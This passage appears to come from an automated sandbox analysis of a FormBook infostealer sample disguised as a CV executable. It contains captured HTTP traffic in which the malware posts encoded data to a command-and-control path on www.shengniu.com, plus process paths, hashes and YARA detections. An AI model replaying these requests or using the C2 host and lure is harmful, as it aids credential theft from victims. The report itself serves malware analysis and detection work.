61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                  Data Ascii: 17DC<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>botcsllc.com is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=expired">
                                  May 27, 2024 12:37:21.735198975 CEST224INData Raw: 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 66 63 37 38 36 33 63
                                  Data Ascii: <img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>botcsllc.com</h1><h2>has expired.</h2><div class='cta'><a class='b
                                  May 27, 2024 12:37:21.735208988 CEST1236INData Raw: 74 6e 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 72 65 6e 65 77 2f 64 6f 6d 61 69 6e 2f 62 6f 74 63 73 6c 6c 63 2e 63 6f 6d 3f 73 6f 75 72 63 65 3d 65 78 70 69 72 65 64 27 3e 52 65 6e 65 77 20 6e 6f
                                  Data Ascii: tn' href='https://www.hover.com/renew/domain/botcsllc.com?source=expired'>Renew now</a></div><p class='note'>If you know the owner of this domain, please let them know.</p><form action='https://www.hover.com/domains/results' method='get'>
                                  May 27, 2024 12:37:21.735266924 CEST1236INData Raw: 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 68 6f 76 65 72 2e 63 6f 6d 2f 68 6f 6d 65 3f 73 6f 75 72 63 65 3d 65 78 70 69 72 65 64 22 3e 48 65 6c 70 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c
                                  Data Ascii: follow" href="https://help.hover.com/home?source=expired">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=expired">Your Account</a></li></ul></nav><nav class='social'><ul><li><a rel="nofollow" href="https://ww
                                  May 27, 2024 12:37:21.735285044 CEST1236INData Raw: 32 33 20 2d 35 35 2e 31 36 39 39 35 2c 2d 31 35 2e 34 37 35 38 32 20 2d 37 32 2e 35 32 34 36 31 2c 2d 33 36 2e 37 36 33 39 36 20 2d 33 2e 30 32 38 37 39 2c 35 2e 31 39 36 36 32 20 2d 34 2e 37 36 34 34 33 2c 31 31 2e 32 34 30 34 38 20 2d 34 2e 37
                                  Data Ascii: 23 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0
                                  May 27, 2024 12:37:21.735296965 CEST1236INData Raw: 35 7a 4d 37 36 38 20 31 32 37 30 20 71 2d 37 20 30 20 2d 37 36 2e 35 20 30 2e 35 74 2d 31 30 35 2e 35 20 30 74 2d 39 36 2e 35 20 2d 33 74 2d 31 30 33 20 2d 31 30 74 2d 37 31 2e 35 20 2d 31 38 2e 35 71 2d 35 30 20 2d 32 30 20 2d 38 38 20 2d 35 38
                                  Data Ascii: 5zM768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t9
                                  May 27, 2024 12:37:21.735306978 CEST206INData Raw: 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 6d 29 0a 20 20 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f
                                  Data Ascii: tNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-45', 'auto'); ga('send', 'pageview');</script></body></html>0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  53192.168.2.749764152.32.189.143806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:37:27.283700943 CEST748OUTPOST /wy0r/ HTTP/1.1
                                  Host: www.shengniu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.shengniu.com
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.shengniu.com/wy0r/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 62 78 4c 77 36 38 45 6d 30 53 6c 43 6d 75 34 4e 57 54 4b 65 45 75 64 35 33 72 46 46 55 79 43 4d 4a 56 45 6d 47 35 34 67 58 65 66 48 32 62 64 43 48 72 53 6d 51 67 73 67 58 33 36 6c 7a 4a 59 55 32 58 49 68 70 45 4b 39 32 77 46 4d 45 50 45 4f 51 51 68 72 71 36 48 44 72 58 70 49 41 55 43 4e 6c 64 6f 71 2f 5a 6b 4c 6b 45 4f 5a 42 61 72 56 41 5a 58 4a 31 46 69 31 6e 46 59 47 6b 4f 4a 35 4c 65 61 70 46 76 4b 36 37 36 2b 72 30 4d 38 6c 44 53 67 52 33 63 6f 66 57 4b 58 79 78 6f 5a 55 54 48 4c 43 7a 50 61 38 6f 71 58 6b 4b 65 48 61 6d 71 30 4d 75 5a 56 79 44 59 4e 38 54 4e 2b 32 62 4c 7a 67 6d 56 35 68 4a 4d 52 46 33 48 59 4d 34 77 3d 3d
                                  Data Ascii: 4h=bxLw68Em0SlCmu4NWTKeEud53rFFUyCMJVEmG54gXefH2bdCHrSmQgsgX36lzJYU2XIhpEK92wFMEPEOQQhrq6HDrXpIAUCNldoq/ZkLkEOZBarVAZXJ1Fi1nFYGkOJ5LeapFvK676+r0M8lDSgR3cofWKXyxoZUTHLCzPa8oqXkKeHamq0MuZVyDYN8TN+2bLzgmV5hJMRF3HYM4w==
                                  May 27, 2024 12:37:28.150044918 CEST551INHTTP/1.1 404
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Mon, 27 May 2024 10:37:28 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Origin
                                  Vary: Access-Control-Request-Method
                                  Vary: Access-Control-Request-Headers
                                  Content-Language: en-US
                                  Content-Encoding: gzip
                                  Data Raw: 65 37 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 90 c1 6a c3 30 10 44 7f 65 6e 69 a1 54 89 6b 48 08 b2 6e 2d 81 90 d2 43 a0 e7 b5 b5 89 44 15 49 d8 72 5b ff 7d d7 6e e9 6d d9 d9 99 7d 8c 76 e5 16 8c 6e 93 9d 8c 76 1b f3 ee 7c e1 40 2d 07 3c f7 7d ea f1 46 57 d6 4a 14 9d cd d9 f9 01 94 73 f0 1d 15 9f 22 1c 0d 88 09 fc 3d af 7c c1 4d 44 1f af b8 88 51 f1 ec 7f c0 90 30 a5 11 d4 33 06 e6 59 2d 4b 8c 24 e1 42 21 b4 d4 7d 3c 6a 95 8d b6 fe 13 de 36 ab ae 67 2a 6c 57 e6 24 2f 4e 34 a1 da 62 b3 db 3f 6d f7 d5 0e 87 e3 19 d5 ba aa b5 92 f3 c5 23 58 2c e1 5f c2 42 11 63 14 1a ee c4 8f 05 00 77 65 ca dc bc a6 82 97 34 46 2b 40 85 ca 38 34 f5 ba be 97 bf ff 29 7f a3 fa ad 42 2d bd fc 00 28 2b 8b de 1e 01 00 00 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: e7=j0DeniTkHn-CDIr[}nm}vnv|@-<}FWJs"=|MDQ03Y-K$B!}<j6g*lW$/N4b?m#X,_Bcwe4F+@84)B-(+0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  54192.168.2.749765152.32.189.143806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:37:29.823894978 CEST768OUTPOST /wy0r/ HTTP/1.1
                                  Host: www.shengniu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.shengniu.com
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.shengniu.com/wy0r/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 62 78 4c 77 36 38 45 6d 30 53 6c 43 6d 4f 49 4e 55 77 69 65 4d 75 64 2b 70 62 46 46 4e 43 43 49 4a 56 59 6d 47 38 55 57 58 73 37 48 32 37 74 43 47 71 53 6d 54 67 73 67 63 58 36 61 2b 70 59 44 32 58 56 65 70 46 32 39 32 77 42 4d 45 4f 30 4f 58 6a 5a 6f 72 71 47 6c 2b 48 70 4b 50 30 43 4e 6c 64 6f 71 2f 64 45 6c 6b 45 57 5a 41 71 62 56 50 59 58 4b 34 6c 69 32 6b 46 59 47 67 4f 4a 48 4c 65 61 66 46 71 72 79 37 35 4b 72 30 49 34 6c 44 44 67 53 35 73 6f 6a 53 4b 57 51 78 36 51 61 61 31 2f 4d 77 35 53 55 70 70 6e 42 4c 6f 61 34 38 49 34 67 77 49 74 4a 48 61 70 4b 45 72 6a 44 5a 4b 33 34 72 33 4e 41 57 37 30 76 36 56 35 49 75 45 4a 67 47 39 77 72 65 4b 59 75 70 42 71 59 53 4d 4d 73 33 6d 30 3d
                                  Data Ascii: 4h=bxLw68Em0SlCmOINUwieMud+pbFFNCCIJVYmG8UWXs7H27tCGqSmTgsgcX6a+pYD2XVepF292wBMEO0OXjZorqGl+HpKP0CNldoq/dElkEWZAqbVPYXK4li2kFYGgOJHLeafFqry75Kr0I4lDDgS5sojSKWQx6Qaa1/Mw5SUppnBLoa48I4gwItJHapKErjDZK34r3NAW70v6V5IuEJgG9wreKYupBqYSMMs3m0=
                                  May 27, 2024 12:37:30.691446066 CEST550INHTTP/1.1 404
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Mon, 27 May 2024 10:37:30 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Origin
                                  Vary: Access-Control-Request-Method
                                  Vary: Access-Control-Request-Headers
                                  Content-Language: en-US
                                  Content-Encoding: gzip
                                  Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 90 41 4b c4 30 10 85 ff ca bb ad 82 98 6e b7 b0 b2 a4 b9 29 82 ac 78 58 f0 3c 6d 67 37 c1 6c 12 d2 54 ed bf 77 5a c5 db 30 6f de 9b 8f a7 6d b9 7a a3 bb 38 cc 46 db ad 79 b7 ae b0 a7 8e 3d 1e 73 8e 19 6f 74 61 ad 44 d1 c9 9c ac 1b 41 29 79 d7 53 71 31 c0 d2 88 10 c1 df cb ca 15 5c 45 74 e1 82 b3 18 15 2f fe 3b 8c 11 73 9c 40 99 31 32 2f 6a 59 63 24 09 67 f2 be a3 fe e3 5e ab 64 f4 e0 3e e1 86 76 d3 67 a6 c2 c3 c6 1c e5 c5 91 66 d4 7b 6c 1f 0e bb fd 61 57 e1 f9 e5 84 ba aa 1b ad e4 7c f5 08 16 4b f8 97 b0 50 c0 14 84 86 7b f1 63 05 c0 4d 99 13 b7 af b1 e0 29 4e 61 10 a0 42 65 1a db a6 6a 6e e5 ef 7f ca df a8 7e ab 50 6b 2f 3f e1 8b a3 81 1e 01 00 00 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: e6=AK0n)xX<mg7lTwZ0omz8Fy=sotaDA)ySq1\Et/;s@12/jYc$g^d>vgf{laW|KP{cM)NaBejn~Pk/?0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  55192.168.2.749766152.32.189.143806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:37:32.352309942 CEST1781OUTPOST /wy0r/ HTTP/1.1
                                  Host: www.shengniu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.shengniu.com
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.shengniu.com/wy0r/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 62 78 4c 77 36 38 45 6d 30 53 6c 43 6d 4f 49 4e 55 77 69 65 4d 75 64 2b 70 62 46 46 4e 43 43 49 4a 56 59 6d 47 38 55 57 58 73 7a 48 33 49 56 43 45 4a 36 6d 64 41 73 67 43 6e 36 68 2b 70 5a 42 32 58 4e 61 70 46 36 74 32 79 70 4d 56 63 38 4f 53 53 5a 6f 6c 71 47 6c 38 48 70 4a 41 55 44 46 6c 5a 45 6d 2f 5a 6f 6c 6b 45 57 5a 41 73 58 56 49 4a 58 4b 36 6c 69 31 6e 46 59 42 6b 4f 4a 38 4c 65 79 68 46 71 6e 69 34 50 36 72 7a 73 63 6c 45 78 49 53 2f 38 6f 62 66 71 57 32 78 36 4d 52 61 31 69 67 77 35 4f 36 70 71 33 42 4a 65 37 38 68 59 6b 61 69 4a 56 55 4b 61 4a 72 52 74 6e 77 57 4a 53 44 6b 6d 35 41 58 37 41 57 35 44 30 45 6b 69 6f 33 57 50 56 56 61 4b 77 4a 71 78 47 51 41 50 45 53 73 69 5a 53 73 63 39 39 66 62 50 79 34 62 4b 33 73 65 46 74 79 62 42 6f 5a 50 70 4b 38 6a 73 57 39 78 41 33 78 50 73 64 53 79 4e 32 79 35 2f 4e 46 59 6d 79 59 39 79 64 5a 32 52 42 6b 5a 4e 6b 33 4f 4c 4d 6a 30 6e 4c 47 42 67 42 58 43 63 70 47 2f 74 48 36 6c 4f 76 48 53 61 37 4f 69 6d 64 57 43 77 50 4f 45 65 4b 5a 54 63 [TRUNCATED]
                                  Data Ascii: 4h=bxLw68Em0SlCmOINUwieMud+pbFFNCCIJVYmG8UWXszH3IVCEJ6mdAsgCn6h+pZB2XNapF6t2ypMVc8OSSZolqGl8HpJAUDFlZEm/ZolkEWZAsXVIJXK6li1nFYBkOJ8LeyhFqni4P6rzsclExIS/8obfqW2x6MRa1igw5O6pq3BJe78hYkaiJVUKaJrRtnwWJSDkm5AX7AW5D0Ekio3WPVVaKwJqxGQAPESsiZSsc99fbPy4bK3seFtybBoZPpK8jsW9xA3xPsdSyN2y5/NFYmyY9ydZ2RBkZNk3OLMj0nLGBgBXCcpG/tH6lOvHSa7OimdWCwPOEeKZTcu1jLFjpEzA0bK5WulcyhpnNEiGwiid35unjDqgRR1WhdggWQciGvo1T4rV2nLWAYXvXcKW4U6a2ml0A1nWg29boICSs3zzXmkfjGwlZdR+py+k3QW5y1EyRwzr9USw/ViMLKXE3DVmGtFNT3Bgpgw7MLHNaqw/R8/OJHsxMVaqHplA6fdKCSVIQ++A4qGpRsNpmStCmrlemiKelZzdWNBPK2n3Pt++838PJR4x31MrlPYXyfLrmCCgXvvMeVjbt9Od2n5jYid0XMpW19cMNPGM0veYUOG1krGZBSC57J9/tFaXXGnxO/v+47Qy1VgGxvtlATp6AnMz3soifMijaJ8unFRR0twRQYAoLMKXQ3jVBjbi6km8iTBg2UDubOKifF4vro9i2eemDrGVtIN++c3AAoaR1bXzdKR7Z2+D7CAePbI2qnehj/ph44HXS5TGzApFDC39mbtNBZIyachwpKJDkXnCWZN9WxBpN1hL3za2uySLEq+GmYCud0BXbMEhEKOZOZDJPxyeGH3izRoOuc6ugqc8BVRp7zoS1hhfUf5KL1Rv84wnY5BUFFkvf0y0Ury7By3OHhEWWVvPJkf72Gi0dajV/mQgmu2MTDkNOFcEqTz3Jiq0Lq5mfFdPnSG8+PbldZglWHLE7KkoJkb39blx0MdY8VyRI/UZ [TRUNCATED]
                                  May 27, 2024 12:37:33.251585960 CEST550INHTTP/1.1 404
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Mon, 27 May 2024 10:37:33 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Origin
                                  Vary: Access-Control-Request-Method
                                  Vary: Access-Control-Request-Headers
                                  Content-Language: en-US
                                  Content-Encoding: gzip
                                  Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 90 41 4b c4 30 10 85 ff ca bb ad 82 98 dd b6 b0 b2 a4 b9 29 82 ac 78 58 f0 3c 6d 67 37 c1 6c 52 92 54 ed bf 77 5a c5 db 30 6f de 9b 8f a7 6d b9 7a a3 bb 38 cc 46 db 9d 79 b7 ae b0 a7 8e 3d 1e 53 8a 09 6f 74 61 ad 44 d1 a3 39 59 97 41 e3 e8 5d 4f c5 c5 00 4b 19 21 82 bf 97 95 2b b8 8a e8 c2 05 67 31 2a 5e fc 77 c8 11 73 9c 40 89 91 99 17 b5 ac 31 92 84 33 79 df 51 ff 71 af d5 68 f4 e0 3e e1 86 76 d3 27 a6 c2 c3 c6 1c e5 c5 91 66 54 7b ec 1e 0e f5 fe 50 d7 78 7e 39 a1 da 56 8d 56 72 be 7a 04 8b 25 fc 4b 58 28 60 0a 42 c3 bd f8 b1 02 e0 a6 cc 23 b7 af b1 e0 29 4e 61 10 a0 42 65 ca 6d b3 6d 6e e5 ef 7f ca df a8 7e ab 50 6b 2f 3f 52 fc 11 e1 1e 01 00 00 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: e6=AK0)xX<mg7lRTwZ0omz8Fy=SotaD9YA]OK!+g1*^ws@13yQqh>v'fT{Px~9VVrz%KX(`B#)NaBemmn~Pk/?R0


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  56192.168.2.749767152.32.189.14380
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:37:35.713799953 CEST487OUTGET /wy0r/?4h=WzjQ5Lku/CcVmfYMLh2se4NW5p5EcwqyA3YiOMIwT77nsakaLKShRywTCni07+Ypglha0We7/XFNEOgzZwpW0Iau+HgTJhKyqKoR5usZjmbjCMnZJqH26R2XpANM+dd2J9nsS8vZ76/r&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.shengniu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:37:36.612344980 CEST564INHTTP/1.1 404
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Mon, 27 May 2024 10:37:36 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Content-Length: 286
                                  Connection: close
                                  Vary: Origin
                                  Vary: Access-Control-Request-Method
                                  Vary: Access-Control-Request-Headers
                                  Content-Language: en-US
                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 57 68 69 74 65 6c 61 62 65 6c 20 45 72 72 6f 72 20 50 61 67 65 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 68 61 73 20 6e 6f 20 65 78 70 6c 69 63 69 74 20 6d 61 70 70 69 6e 67 20 66 6f 72 20 2f 65 72 72 6f 72 2c 20 73 6f 20 79 6f 75 20 61 72 65 20 73 65 65 69 6e 67 20 74 68 69 73 20 61 73 20 61 20 66 61 6c 6c 62 61 63 6b 2e 3c 2f 70 3e 3c 64 69 76 20 69 64 3d 27 63 72 65 61 74 65 64 27 3e 4d 6f 6e 20 4d 61 79 20 32 37 20 31 38 3a 33 37 3a 33 36 20 48 4b 54 20 32 30 32 34 3c 2f 64 69 76 3e 3c 64 69 76 3e 54 68 65 72 65 20 77 61 73 20 61 6e 20 75 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 20 28 74 79 70 65 3d 4e 6f 74 20 46 6f 75 6e 64 2c 20 73 74 61 74 75 73 3d 34 30 34 29 2e 3c 2f 64 69 76 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Mon May 27 18:37:36 HKT 2024</div><div>There was an unexpected error (type=Not Found, status=404).</div><div></div></body></html>


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:06:33:24
                                  Start date:27/05/2024
                                  Path:C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"
                                  Imagebase:0xa10000
                                  File size:734'720 bytes
                                  MD5 hash:1F690A7D24C0C325D681DB7D114520D4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:06:33:25
                                  Start date:27/05/2024
                                  Path:C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"
                                  Imagebase:0xa20000
                                  File size:734'720 bytes
                                  MD5 hash:1F690A7D24C0C325D681DB7D114520D4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:14
                                  Start time:06:33:44
                                  Start date:27/05/2024
                                  Path:C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe"
                                  Imagebase:0xb20000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:15
                                  Start time:06:33:46
                                  Start date:27/05/2024
                                  Path:C:\Windows\SysWOW64\TSTheme.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SysWOW64\TSTheme.exe"
                                  Imagebase:0x350000
                                  File size:56'320 bytes
                                  MD5 hash:6634A157115551E6DDDFB4748C0565FB
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:false

                                  General

                                  Target ID:16
                                  Start time:08:31:33
                                  Start date:27/05/2024
                                  Path:C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe"
                                  Imagebase:0xb20000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:18
                                  Start time:08:31:45
                                  Start date:27/05/2024
                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                  Imagebase:0x7ff722870000
                                  File size:676'768 bytes
                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:11.3%
                                    Dynamic/Decrypted Code Coverage:98.9%
                                    Signature Coverage:0%
                                    Total number of Nodes:285
                                    Total number of Limit Nodes:12
